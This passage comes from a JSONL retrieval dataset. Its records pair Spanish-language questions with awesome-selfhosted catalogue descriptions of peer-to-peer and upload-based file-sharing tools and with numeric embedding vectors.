0.00743, -0.02225, -0.01758, 0.10753, 0.04271, -0.06765, 0.04033, 0.05671, -0.00598, -0.00245, -0.00599, 0.07073, 0.01496, 0.02635, 0.04984, 0.07447, -0.0845, 0.03797, 0.00777, -0.01361, 0.09211, 0.02526, 0.05541, 0.07568, -0.10627, 0.02473, -0.01829, 0.02365, 0.06362, 0.03032, 0.03344, 0.02109, -0.06207, -0.02292, 0.05887, 0.0701, 0.09075, -0.00272, -0.08169, 0.06773, 0.06167, -0.02421, -0.04273, 0.01075, -0.05748, -0.08621, 0.02203, -0.02592, -0.01622, 0.00751, 0.03464, -0.02804, 0.02454, -0.02239, 0.05693, -0.08104, 0.05616, 0.00869, -0.03471, -0.10777, 0.01006, -0.04077, -0.00966, 0.02118, 0.01733, 0.02711, -0.01726, -0.13531, -0.10373, 0.07251, 0.00686, 0.0109, -0.04924, 0.06108, -0.08306, -0.07201, 0.08013, -0.00363, -0.08442, -0.02033, 0.06066, 0.00025, -0.01895, -0.0957, 0.0277, -0.0149, -0.01859, -0.02537, 0.09813, -0.00173, -0.06342, 0.00906, -0.05094, 0.03279, -0.00392, -0.07923, 0.05071, 0.02959, 0.01328, 0.06231, -0.0035, 0.04503, 0.0009, -0.07198, 0.01194, -0.09169, -0.02465, -0.035, 0.00623, 0.03257, -0.04231, -0.02555, -0.0547, -0.03006, -0.01738, -0.03553, -0.06794, 0.02839, 0.04492, -0.0335, -0.05122, -0.01486, 0.09827, -0.01623, -0.0039, -0.02113, -0.02995, 0.02811, 0.02404, -0.03764, 0.03363, 0.08289, 0.05378, 0.00493, -0.03358, 0.01573, 0.01006, 0.03959, -0.03922, -0.02528, -0.0065, 0.06496, 0.00969, 0.04156, 0.04628, -0.01104, 0.00034, 0.01448, 0.031, -4e-05, -0.01816, 0.064, -0.05518, 0.01392, -0.0437, 0.01502, -0.08942, -0.00998, -0.04999, -0.04493, -0.04957, 0.0563, -0.01497, 0.01032, 0.04406, -0.03715]} +{"tipo": "pregunta", "herramienta": "File Transfer - Peer-to-peer Filesharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Peer-to-peer Filesharing", "tema": "file transfer - peer-to-peer filesharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Peer-to-peer Filesharing: bittorrent-tracker β€” Simple, robust, BitTorrent tracker (client and server) implementation [MIT, Nodejs]. Deluge β€” Lightweight, cross-platform BitTorrent client [GPL-3.0, Python/deb]. PrivyDrop β€” Simple and user-friendly, breakpoint-resumable peer-to-peer text, image, and file transfer tool based on WebRTC [MIT, Docker/Nodejs]. qBittorrent β€” Free cross-platform bittorrent client with a feature rich Web UI for remote access [GPL-2.0, C++]. slskd β€” A modern client-server application for the Soulseek file sharing network [⚠, AGPL-3.0, Docker/C#]. Transmission β€” Fast, easy, free Bittorrent client [GPL-3.0, C++/deb]. Webtor β€” Web-based torrent client with instant audio/video streaming [MIT, Docker].", "indexar": "con quΓ© puedo compartir archivos directamente con otra persona sin que pase por un servidor?", "v": [-0.06325, 0.16444, -0.10241, -0.12249, -0.1319, -0.11455, 0.07176, -0.11992, 0.04591, -0.07313, -0.1162, -0.02534, 0.07101, 0.00235, 0.07528, 0.01522, 0.28622, 0.0906, 0.14151, 0.00073, 0.034, 0.04132, 0.0408, -0.08061, -0.03783, -0.05804, 0.09148, 0.03761, -0.06396, -0.06093, -0.08007, -0.05514, 0.06838, 0.01222, 0.08536, 0.0328, 0.03213, 0.21072, -0.03052, -0.00718, 0.06349, 0.08549, -0.01412, 0.12882, -0.01415, -0.05492, -0.0403, -0.02829, 0.10551, -0.06343, -0.10471, -0.04582, -0.15415, -0.00476, -0.08842, 0.0271, -0.00888, -0.14599, 0.1099, -0.01195, -0.15409, 0.09692, -0.06295, -0.0307, 0.02019, 0.01943, -0.01115, -0.0323, -0.15489, 0.04868, -0.00272, 0.03338, 0.00023, -0.04068, 0.03287, 0.00889, 0.00276, -0.01921, 0.0018, 0.07509, 0.06647, 0.03963, 0.01882, 0.06537, 0.00288, -0.003, 0.06101, -0.02998, 0.10856, 0.02808, 0.06763, 0.01905, -0.0421, -0.04018, -0.02747, -0.00578, 0.11504, -0.04967, -0.08276, -0.04612, 0.04234, 0.04303, -0.03048, 0.12827, 0.01187, 0.07663, 0.09985, -0.02996, 0.01641, -0.03792, 0.16482, 0.0352, 0.00285, 0.073, -0.07889, -0.0254, -0.05045, -0.01038, -0.00482, 0.06735, -0.07637, 0.00217, 0.04445, -0.00676, 0.02654, -0.04202, 0.08541, 0.10753, -0.09342, 0.02428, -0.03166, -0.00955, -0.02241, -0.03759, -0.05424, -0.02853, 0.10519, -0.04024, -0.01667, -0.0668, 0.08647, -0.01261, 0.01058, 0.04993, 0.07424, -0.01365, 0.05314, -0.10036, -0.06479, -0.08457, -0.02807, -0.06609, -0.01612, -0.02935, -0.05934, 0.01231, 0.02936, -0.08524, -0.08336, 0.05654, -0.04227, 0.08999, -0.08531, 0.05771, 0.0046, -0.04116, 0.00169, 0.01654, 0.02314, 0.02472, -0.0005, 0.01581, -0.04783, -0.04296, 0.01395, 0.01945, -0.07354, -0.0688, 0.01695, -0.01953, -0.00284, -0.039, -0.04389, 0.05188, -0.03856, -0.01931, 0.00782, 0.0662, -0.02314, 0.0717, -0.0282, 0.01797, -0.04292, 0.07491, 0.01368, -0.02189, -0.02573, 0.01897, -0.02529, -0.02815, -0.009, -0.05733, -0.00508, 0.07201, -0.02329, -0.0298, -0.07272, 0.01949, 0.0633, 0.00867, -0.03968, 0.02681, 0.10626, -0.07697, -0.02257, 0.058, 0.06598, -0.01116, 0.03086, 0.00141, 0.03114, 0.01133, 0.05128, -0.01368, 0.05488, 0.06917, -0.02513, -0.02591, 0.03377, 0.02183, -0.08217, 0.02898, 0.02112, 0.00243, 0.01868, -0.00755, -0.02372, -0.03064, -0.03046, -0.03848, 0.01912, 0.0672, 0.00153, -0.07905, -0.014, -0.02626, -0.01506, -0.01581, -0.05292, -0.05207, -0.01164, -0.02099, 0.00402, 0.02053, 0.00548, -0.00106]} +{"tipo": "pregunta", "herramienta": "File Transfer - Peer-to-peer Filesharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Peer-to-peer Filesharing", "tema": "file transfer - peer-to-peer filesharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Peer-to-peer Filesharing: bittorrent-tracker β€” Simple, robust, BitTorrent tracker (client and server) implementation [MIT, Nodejs]. Deluge β€” Lightweight, cross-platform BitTorrent client [GPL-3.0, Python/deb]. PrivyDrop β€” Simple and user-friendly, breakpoint-resumable peer-to-peer text, image, and file transfer tool based on WebRTC [MIT, Docker/Nodejs]. qBittorrent β€” Free cross-platform bittorrent client with a feature rich Web UI for remote access [GPL-2.0, C++]. slskd β€” A modern client-server application for the Soulseek file sharing network [⚠, AGPL-3.0, Docker/C#]. Transmission β€” Fast, easy, free Bittorrent client [GPL-3.0, C++/deb]. Webtor β€” Web-based torrent client with instant audio/video streaming [MIT, Docker].", "indexar": "quΓ© programa sirve para descargar archivos de forma rΓ‘pida y ligera desde cualquier sistema operativo?", "v": [-0.01505, 0.05354, -0.10667, -0.17157, 0.0542, -0.13397, 0.03126, -0.06663, -0.09869, -0.04892, -0.05963, -0.198, 0.06915, -0.07961, 0.16339, -0.05386, 0.07949, -0.11544, 0.04314, -0.09118, -0.08885, 0.03407, -0.00259, -0.10819, -0.09373, -0.0119, 0.05083, -0.0248, -0.16979, -0.04969, -0.02748, 0.05693, 0.1352, -0.03283, -0.06059, 0.12519, 0.06363, -0.01373, -0.00913, 0.04047, 0.0773, 0.00822, -0.00153, 0.11664, 0.09421, -0.04332, 0.11876, 0.01652, 0.0157, -0.09811, -0.02543, -0.00933, -0.03843, -0.04701, -0.02905, -0.17051, 5e-05, -0.18128, 0.00194, -0.03211, -0.00867, 0.07925, 0.00744, -0.11019, 0.01707, 0.02999, 0.01895, -0.02304, -0.05905, 0.00425, -0.00302, 0.0647, 0.08565, 0.05555, -0.04538, 0.07039, -0.03322, -0.0008, 0.03141, -0.02787, 0.12178, -0.02337, -0.00891, 0.03709, -0.05461, -0.0937, 0.04564, 0.00065, -0.06414, -0.00521, 0.09925, -0.01532, 0.03027, 0.11894, 0.06735, -0.0805, 0.04452, 0.0695, 0.02635, 0.05204, -0.03468, -0.12118, -0.08399, 0.11583, -0.05758, 0.01724, 0.0239, 0.03635, -0.03494, -0.04306, 0.01855, -0.03816, 0.016, 0.04264, -0.05186, 0.0571, 0.01755, -0.02082, -0.0744, -0.00743, -0.09245, 0.07996, -0.02523, 0.01434, 0.11694, -0.04892, 0.01661, 0.10128, -0.05434, 0.06175, 0.09414, -0.01801, -0.07716, 0.0287, -0.0765, -0.10905, 0.0083, 0.01867, 0.0228, -0.04855, 0.08418, 0.04516, 0.03288, 0.01179, 0.06313, -0.02785, 0.10786, -0.10991, 0.0286, -0.09372, 0.04923, 0.00748, -0.05528, -0.04601, -0.05878, -0.04442, 0.0442, -0.0761, -0.068, -0.00219, -0.00987, 0.02596, 0.0298, -0.01288, -0.03415, -0.05827, -0.00579, -0.00339, 0.0736, 0.09202, -0.02017, 0.06002, 0.04821, -0.09542, -0.0, 0.01593, -0.04881, -0.0864, 0.07117, -0.02114, -0.11699, 0.07062, 0.06047, 0.05091, -0.03485, -0.01539, 0.00056, 0.07228, -0.00107, 0.02022, 0.03016, 0.06991, -0.03876, -0.02751, -0.0433, -0.01354, -0.08082, -0.02871, 0.04305, -0.04232, -0.09285, -0.06661, -0.01307, -0.03084, 0.02526, 0.05131, 0.06081, -0.00043, 0.03907, 0.08432, -0.03052, 0.00208, 0.08433, -0.02551, -0.01203, -0.00439, -0.00487, 0.05157, 0.08243, -0.01524, -0.00439, -0.01304, 0.06724, 0.10994, -0.01687, -0.02135, 0.00606, 0.04069, 0.00423, -0.04083, -0.00206, -0.02144, 0.00313, -0.04177, 0.03817, -0.05433, -0.01371, 0.0092, -0.03811, -0.08005, 0.02189, 0.08734, 0.02764, -0.03913, -0.05553, -0.00661, -0.01872, -0.00839, 0.01402, -0.06259, -0.05288, 0.07597, 0.01922, -0.01433, 0.01756, 0.04042]} +{"tipo": "pregunta", "herramienta": "File Transfer - Peer-to-peer Filesharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Peer-to-peer Filesharing", "tema": "file transfer - peer-to-peer filesharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Peer-to-peer Filesharing: bittorrent-tracker β€” Simple, robust, BitTorrent tracker (client and server) implementation [MIT, Nodejs]. Deluge β€” Lightweight, cross-platform BitTorrent client [GPL-3.0, Python/deb]. PrivyDrop β€” Simple and user-friendly, breakpoint-resumable peer-to-peer text, image, and file transfer tool based on WebRTC [MIT, Docker/Nodejs]. qBittorrent β€” Free cross-platform bittorrent client with a feature rich Web UI for remote access [GPL-2.0, C++]. slskd β€” A modern client-server application for the Soulseek file sharing network [⚠, AGPL-3.0, Docker/C#]. Transmission β€” Fast, easy, free Bittorrent client [GPL-3.0, C++/deb]. Webtor β€” Web-based torrent client with instant audio/video streaming [MIT, Docker].", "indexar": "existe alguna alternativa gratuita a bittorrent que funcione bien en la nube?", "v": [0.00965, 0.0352, -0.23072, 0.05144, 0.01772, -0.02981, -0.12231, -0.05166, -0.22376, -0.18534, -0.00861, -0.1669, 0.03847, 0.13721, 0.03206, -0.1103, -0.04919, -0.09046, 0.15165, -0.06586, 0.00634, -0.0454, -0.10274, 0.00172, -0.07508, -0.09991, -0.00231, 0.05601, -0.05954, 0.07783, 0.0746, -0.06251, 0.1398, -0.03027, -0.04552, 0.00971, 0.01511, 0.03521, 0.04258, -0.00715, 0.05392, 0.05179, -0.05226, 0.16277, -0.1018, -0.02652, -0.08937, 0.00373, 0.02065, 0.06813, -0.04173, -0.01249, -0.04361, 0.04999, -0.04681, -0.0182, 0.09166, -0.12451, 0.01305, -0.04603, -0.08872, 0.03414, 0.03042, -0.15176, 0.03221, 0.02049, 0.00701, 0.02405, -0.11179, 0.06016, -0.01442, 0.09681, 0.01252, 0.0065, -0.06948, 0.02627, -0.03195, -0.08555, -0.04271, 0.13785, 0.01478, 0.08189, 0.1045, -0.02134, -0.1694, -0.06206, 0.01236, -0.14568, 0.00864, -0.04606, -0.06285, 0.0213, 0.09275, 0.14291, 0.0571, -0.02019, 0.0545, 0.05328, 0.00219, 0.00519, 0.0875, 0.12704, -0.0146, -0.02297, 0.0187, 0.08077, 0.05217, -0.01977, -0.01891, 0.07279, 0.0236, 0.04402, -0.01575, 0.02718, -0.07255, -0.09416, -0.06795, -0.05188, -0.01669, 0.0535, -0.06206, 0.02559, -0.05107, -0.04697, 0.00284, 0.06375, -0.02191, 0.01588, -0.10925, -0.01052, -0.00614, -0.07635, -0.00646, -0.04183, -0.0335, -0.06197, -0.00927, -0.0637, 0.0085, -0.06179, 0.10979, 0.01314, -0.00386, 0.0035, -0.01964, -0.06848, 0.08771, 0.00073, 0.01137, -0.04003, -0.0147, -0.02383, -0.08887, 0.06765, -0.03555, 0.05995, 0.01159, -0.03289, -0.08901, 0.06535, 0.13433, -0.03292, -0.09724, -0.00075, -0.06535, -0.00492, -0.00541, 0.02071, -0.0422, 0.06705, -0.03639, 0.02399, -0.01724, -0.11804, 0.02524, -0.00843, -0.01661, -0.06598, 0.10064, -0.02984, 0.04209, -0.02522, -0.00682, 0.0012, -0.0327, -0.0503, -0.05561, 0.00323, -0.07056, 0.0423, 0.06134, -0.07224, -0.10487, -0.02926, 0.02552, -0.05505, -0.03016, -0.07551, -0.0679, 0.02498, -0.07018, 0.00043, -0.01083, -0.01372, -0.03662, 0.00435, 0.00322, 0.0382, 0.04021, 0.03193, 0.02574, 0.00993, -0.04561, -0.03969, 0.01436, 0.02146, 0.04184, -0.00672, -0.01522, -0.01678, 0.01123, -0.04292, 0.02467, 0.01057, 0.04828, 0.05546, -0.0054, 0.09059, -0.0002, 0.00796, -0.01251, 0.01263, 0.03496, -0.05582, 0.0006, -0.00503, 0.03419, 0.04656, -0.01547, 0.00823, -0.02092, 0.01969, -0.00572, 0.03888, -0.06212, -0.0146, -0.05983, -0.0078, 0.01816, 0.02575, -0.00244, 0.05463, -0.00337, 0.01135, 0.03923, 0.02134]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: 015 β€” A temporary file sharing platform. Focused on providing one-time, temporary file and text upload, processing, and sharing services [AGPL-3.0, Docker]. Chibisafe β€” File uploader service that aims to to be easy to use and set up. It accepts files, photos, documents, anything you imagine and gives you back a shareable link for you to send to others [MIT, Docker/Nodejs]. Digirecord β€” Record and share audio files (documentation in French) [AGPL-3.0, Nodejs/PHP]. elixire β€” Simple yet advanced screenshot uploading and link shortening service [AGPL-3.0, Python]. Files Sharing β€” File sharing application based on unique and temporary links [GPL-3.0, PHP/Docker]. Flare β€” A nonbloated, modern, and highly configurable file/screenshot vault server with support for ShareX, Flameshot, and Spectacle. Offers OCR search and more [MIT, Docker/Nodejs].", "indexar": "que programa sirve para subir archivos de forma temporal y compartir un link?", "v": [-0.03486, 0.01721, -0.18335, -0.22063, -0.07508, -0.16367, -0.00751, -0.08163, 0.11779, -0.04254, -0.08618, -0.14397, 0.11419, -0.0416, -0.02577, 0.01452, 0.12941, -0.12307, 0.14677, 0.00578, 0.08786, 0.12215, -0.00889, -0.15419, -0.02431, -0.03441, 0.00072, -0.01002, -0.08866, -0.00387, 0.02945, 0.0157, 0.06858, -0.07915, -0.0113, 0.05093, 0.11635, 0.10824, -0.06895, -0.01086, -0.04639, 0.06257, -0.10587, 0.02818, -0.07859, -0.05858, -0.02886, -0.01171, 0.05759, -0.01208, 0.01594, 0.08967, 0.01557, 0.03205, -0.1135, -0.01088, -0.00939, -0.21787, -0.04614, -0.01402, -0.03894, 0.05216, -0.0977, -0.06598, -0.04416, -0.01824, -0.05498, 0.11787, -0.13923, 0.06126, -0.06204, -0.04254, 0.1137, -0.01559, -0.0769, -0.01133, 0.00385, -0.10691, -0.02572, -0.10059, 0.04778, 0.07144, 0.06704, 0.13788, -0.04601, 0.01481, 0.06053, -0.0321, -0.04496, -0.01148, 0.04023, 0.01025, 0.07823, -0.00638, 0.02794, -0.08765, 0.05567, -0.04245, 0.01243, -0.00712, 0.04882, -0.04311, 0.01586, 0.0949, 0.02515, 0.10614, 0.04903, 0.05851, -0.01805, 0.10154, 0.08473, 0.03263, 0.01942, -0.02231, -0.0691, 0.02111, -0.02424, -0.05916, -0.00062, -0.02601, 0.0334, 0.0691, -0.01709, 0.04323, 0.0384, 0.04718, 0.08207, 0.05841, -0.08378, 0.0687, -0.0033, 0.0584, 0.02739, -0.01575, -0.0849, -0.10053, 0.09682, 0.08257, -0.00405, -0.13558, 0.03745, 0.03766, -0.02663, 0.00793, -0.00041, 0.00497, 0.01432, -0.032, -0.01331, -0.06947, -0.02513, 0.02804, -0.02753, -0.02518, -0.0424, -0.0728, 0.00619, -0.02544, -0.13089, -0.01046, -0.00694, 0.07832, -0.01926, -0.03681, 0.00152, -0.08356, 0.0495, 0.01885, 0.09674, 0.03787, 0.05627, 0.04304, 0.00238, -0.08598, -0.00344, 0.05771, -0.07486, -0.09381, 0.00062, 0.02273, -0.03762, -0.0174, 0.07939, 0.06062, -0.04388, -0.08646, 0.02168, 0.03966, -0.06088, 0.03441, -0.03045, -0.07132, -0.04607, 0.03704, 0.0123, -0.0526, -0.03193, 0.02527, 0.05099, 0.04446, -0.04377, -0.07715, -0.00378, 0.05574, 0.01557, -0.00334, 0.00034, 0.0061, 0.08945, 0.07552, -0.05596, -0.0101, 0.06482, -0.01589, 0.04562, 0.01144, 0.00451, 0.06702, 0.00064, -0.00874, -0.03023, -0.001, 0.04566, 0.0542, 0.00998, -0.01057, 0.0177, 0.01564, 0.00819, -0.03063, -0.03239, -0.02715, 0.07206, 0.01602, 0.01208, -0.0517, -0.02476, 0.01922, 0.0344, -0.05723, -0.06277, 0.03462, 0.05701, 0.00515, -0.10678, 0.03088, -0.04227, -0.00895, 0.02925, -0.01928, -0.07541, -0.00907, -0.01953, 0.02218, 0.00319, 0.03991]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: 015 β€” A temporary file sharing platform. Focused on providing one-time, temporary file and text upload, processing, and sharing services [AGPL-3.0, Docker]. Chibisafe β€” File uploader service that aims to to be easy to use and set up. It accepts files, photos, documents, anything you imagine and gives you back a shareable link for you to send to others [MIT, Docker/Nodejs]. Digirecord β€” Record and share audio files (documentation in French) [AGPL-3.0, Nodejs/PHP]. elixire β€” Simple yet advanced screenshot uploading and link shortening service [AGPL-3.0, Python]. Files Sharing β€” File sharing application based on unique and temporary links [GPL-3.0, PHP/Docker]. Flare β€” A nonbloated, modern, and highly configurable file/screenshot vault server with support for ShareX, Flameshot, and Spectacle. Offers OCR search and more [MIT, Docker/Nodejs].", "indexar": "con quΓ© puedo montar una plataforma sencilla para enviar fotos y documentos con enlace?", "v": [-0.0461, 0.17386, -0.19675, -0.18282, -0.10483, -0.1027, 0.00662, -0.05153, -0.17366, -0.13605, -0.12302, -0.11432, 0.09002, -0.07582, 0.05111, 0.04508, 0.12451, -0.08333, 0.07358, -0.07362, -0.04301, -0.03975, -0.12677, -0.12089, -0.02097, -0.05113, 0.0739, -0.01597, -0.05912, -0.07015, 0.01629, -0.01614, -0.04317, 0.12633, -0.02848, -0.03166, 0.10766, 0.05366, -0.0055, -0.05406, -0.03427, -0.02852, -0.03179, 0.09695, -0.1478, 0.02738, 0.00553, -0.03658, 0.00171, 0.00487, 0.03727, -0.099, -0.12791, 0.08006, -0.16465, -0.08573, 0.19857, -0.0864, 0.08761, -0.02461, 0.0242, 0.1323, -0.05941, 0.0696, -0.01535, -0.00083, 0.01539, 0.05572, -0.06234, 0.04699, 0.0753, -0.02134, 0.04842, -0.00954, -0.10932, 0.03889, -0.03267, -0.06507, -0.06975, 0.12985, 0.02827, 0.03561, -0.04969, 0.0425, -0.03156, -0.02775, -0.01477, -0.03699, 0.03997, -0.06583, 0.03239, 0.03264, 0.0761, -0.05648, -0.00343, -0.11446, -0.05904, 0.04612, -0.06381, -0.04524, -0.13819, 0.03611, 0.01152, 0.06571, -0.0992, -0.06906, 0.0205, -0.06036, -0.07149, -0.01687, 0.03756, 0.02649, -0.04338, 0.0888, -0.11344, -0.04872, -0.03025, 0.04434, -0.04854, -0.02526, 0.0421, 0.0665, 0.03332, 0.01394, 0.09104, -0.04227, 0.01792, 0.08106, -0.06611, 0.03827, -0.02139, -0.05844, -0.07768, -0.02339, 0.08134, -0.01402, 0.01007, -0.07777, -0.01265, -0.04886, -0.01473, -0.08418, -0.03612, -0.14672, -0.02627, 0.02421, -0.01127, -0.07294, -0.0279, -0.00595, -0.00325, 0.05575, 0.00247, 0.01158, -0.03644, -0.02466, 0.06627, 0.0113, -0.08401, -0.01841, -0.03999, 0.08433, 0.00226, 0.0593, -0.01836, -0.02618, -0.04627, 0.02491, -0.06842, -0.02419, 0.03856, 0.04372, 0.04922, -0.08722, 0.11269, -0.00405, -0.05351, -0.00964, -0.0246, 0.02605, -0.04885, 0.00333, 0.06027, 0.10138, 0.04623, 0.01358, 0.06994, -0.00238, 0.02915, 0.00453, -0.01393, 0.04122, 0.00582, 0.01828, 0.09934, -0.02314, -0.08767, 0.02501, 0.04091, -0.00182, -0.01747, -0.07218, 0.02875, 0.00244, 0.00192, -0.01535, -0.04391, 0.02769, 0.00753, -0.0034, -0.06754, 0.00408, 0.07177, -0.07568, -0.07441, 0.01795, 0.01647, 0.01435, -0.01561, 0.00319, 0.03972, 0.03062, 0.01187, 0.04719, 0.08041, 0.03749, 0.01631, -0.01099, -0.01, -0.05483, 0.02152, 0.01389, -0.00924, -0.03221, 0.01283, -0.01842, -0.00806, 0.001, -0.0498, -0.01321, 0.00683, 0.00166, -0.0092, 0.0032, -0.05497, 0.02813, -0.0232, -0.01458, 0.01545, -0.04703, -0.00452, -0.02048, 0.01123, -0.04522, -0.02852, -0.0457]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: 015 β€” A temporary file sharing platform. Focused on providing one-time, temporary file and text upload, processing, and sharing services [AGPL-3.0, Docker]. Chibisafe β€” File uploader service that aims to to be easy to use and set up. It accepts files, photos, documents, anything you imagine and gives you back a shareable link for you to send to others [MIT, Docker/Nodejs]. Digirecord β€” Record and share audio files (documentation in French) [AGPL-3.0, Nodejs/PHP]. elixire β€” Simple yet advanced screenshot uploading and link shortening service [AGPL-3.0, Python]. Files Sharing β€” File sharing application based on unique and temporary links [GPL-3.0, PHP/Docker]. Flare β€” A nonbloated, modern, and highly configurable file/screenshot vault server with support for ShareX, Flameshot, and Spectacle. Offers OCR search and more [MIT, Docker/Nodejs].", "indexar": "existe alguna herramienta que permita grabar audio y luego compartirlo fΓ‘cilmente?", "v": [0.04946, 0.19286, -0.20186, -0.07744, -0.00087, -0.09213, -0.00799, 0.02546, -0.09892, -0.1756, -0.00809, -0.03359, -0.00593, 0.00622, 0.14691, 0.0888, 0.02636, -0.0035, -0.0979, 0.03715, 0.00528, 0.10823, -0.07705, -0.08806, -0.06974, -0.10557, 0.05883, -0.06915, -0.15329, 0.09263, 0.04369, 0.07396, 0.01415, -0.14413, -0.18155, -0.13675, 0.03269, -0.01577, -0.00981, 0.11159, -0.00625, 0.09269, -0.05581, 0.04369, -0.01465, -0.01436, -0.04725, 0.02652, -0.06899, 0.08072, 0.03309, -0.07054, -0.07124, -0.03469, -0.0287, -0.10856, 0.21338, -0.12952, 0.02399, -0.09543, -0.01096, 0.00457, 0.01038, -0.05243, 0.00322, 0.08101, 0.06649, -0.04394, -0.1273, 0.10683, -0.08786, 0.07409, 0.05332, 0.08408, 0.06817, -0.0631, -0.07388, -0.09474, -0.00885, -0.01183, 0.01299, -0.09167, 0.02412, -0.00917, -0.09528, 0.00973, 0.09167, 0.00399, -0.01694, -0.01987, -0.03631, 0.05058, 0.02875, -0.03575, 0.06235, -0.09892, 0.12282, 0.06196, -0.0227, -0.0387, 0.09952, 0.02974, -0.06581, 0.03174, 0.01219, 0.08799, 0.00665, -0.0893, 0.03458, 0.03984, 0.0207, 0.1325, -0.00567, -0.03681, -0.0347, -0.00983, 0.00512, -0.09202, 0.02882, -0.00855, 0.02705, 0.10124, -0.08326, -0.08296, -0.06303, -0.02261, -0.06808, 0.05669, 0.0101, 0.0313, -0.01412, -0.05476, 0.03194, -0.05538, 0.00989, -0.0255, 0.03917, -0.02182, 0.01549, -0.08989, 0.01306, 0.04604, -0.03093, -0.1266, 0.02634, 0.01087, -0.02582, -0.034, -0.03106, 0.00841, -0.05064, 0.02337, -0.09459, -0.03138, -0.03665, 0.05499, 0.04771, -0.06968, -0.08435, -0.00161, -0.03019, -0.01047, 0.0286, -0.04314, 0.01739, -0.03628, -0.01262, 0.01579, 0.02083, -0.02136, -0.01331, -0.03259, 0.07879, -0.07593, -0.02744, -0.06451, -0.04559, -0.03349, 0.08027, -0.09592, -0.05147, 0.05157, -0.03022, 0.00896, 0.04611, 0.0014, 0.03551, 0.00815, -0.07903, 0.02516, 0.04212, -0.00302, 0.01733, -0.01267, 0.03148, -0.03683, -0.05692, -0.06457, -0.01816, 0.06225, -0.11466, -0.04906, -0.03364, -0.07373, 0.05453, 0.01375, -0.07126, -0.01315, 0.04302, -0.01373, 0.02872, 0.02422, -0.02946, -0.05518, -0.00684, 0.0175, -0.00402, 0.05047, -0.04404, -0.00565, 0.04447, 0.04528, 0.11107, -0.01459, 0.02948, 0.06373, 0.02732, 0.02437, 0.00894, -0.01058, 0.02429, 0.0361, -0.04945, -0.02369, 0.023, 0.00533, -0.00874, -0.02212, -0.04706, -0.01862, 0.03758, 0.04636, -0.02859, -0.02142, -0.03087, -0.03728, 0.00817, 0.04327, 0.00216, -0.12832, 0.01853, 0.0255, 0.0802, 0.0055, 0.02643, -0.04256]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: Gokapi β€” Lightweight server to share files, which expire after a set amount of downloads or days. Similar to the discontinued Firefox Send, with the difference that only the admin is allowed to upload files [GPL-3.0, Go/Docker]. goploader β€” Easy file sharing with server-side encryption, curl/httpie/wget compliant [MIT, Go]. GoSƐ β€” Modern file-uploader focusing on scalability and simplicity. It only depends on a S3 storage backend and hence scales horizontally without the need for additional databases or caches [Apache-2.0, Go/Docker]. Jirafeau β€” One-click-fileshare project. Select your file, upload, and share a link. That's it [AGPL-3.0, PHP/Docker]. OnionShare β€” Securely and anonymously share a file of any size [GPL-3.0, Python/deb]. PicoShare β€” Minimalist, easy-to-host service for sharing images and other files [AGPL-3.0, Go/Docker]. Picsur β€” Simple imaging hosting platform that allows you to easily host, edit, and share images [AGPL-3.0, Docker].", "indexar": "que programa sirve para compartir archivos de forma segura y anΓ³nima en la nube?", "v": [0.08964, -0.01958, -0.12643, -0.13673, 0.02773, -0.14654, -0.15262, -0.17438, -0.13481, -0.14747, -0.04441, -0.15316, 0.05091, -0.00932, -0.13141, -0.00472, 0.08329, -0.03605, 0.11086, 0.15355, 0.00331, 0.03592, -0.10105, -0.0816, -0.07888, -0.08923, 0.11382, 0.09477, 0.04394, 0.011, -0.02443, -0.05117, 0.10664, -0.01743, -0.00761, 0.04735, 0.01296, -0.01683, -0.07516, -0.01037, -0.00271, 0.02575, -0.03782, 0.1344, 0.01977, 0.01701, 0.01538, -0.03205, 0.09747, 0.01728, -0.10941, -0.02611, -0.0121, 0.01564, -0.06628, -0.01239, -0.04131, -0.18353, -0.0441, 0.01886, -0.10654, 0.06291, -0.01933, -0.12709, 0.04131, -0.03282, 0.04577, 0.06447, -0.20938, 0.06718, 0.04905, 0.04093, 0.03087, 0.04181, -0.02638, -0.01163, -0.05586, -0.03702, -0.02035, 0.07538, 0.01381, 0.08608, 0.0295, 0.10619, -0.06519, -0.00935, 0.02212, -0.04008, -0.02925, 0.02117, 0.00463, 0.02038, 0.06365, 0.07283, 0.05159, -0.00129, 0.09633, 0.07909, -0.08817, -0.0245, 0.06903, 0.03937, 0.00289, 0.08968, -0.02222, 0.08033, 0.00646, 0.0186, 0.06187, -0.01456, 0.06857, 0.04995, -0.0167, 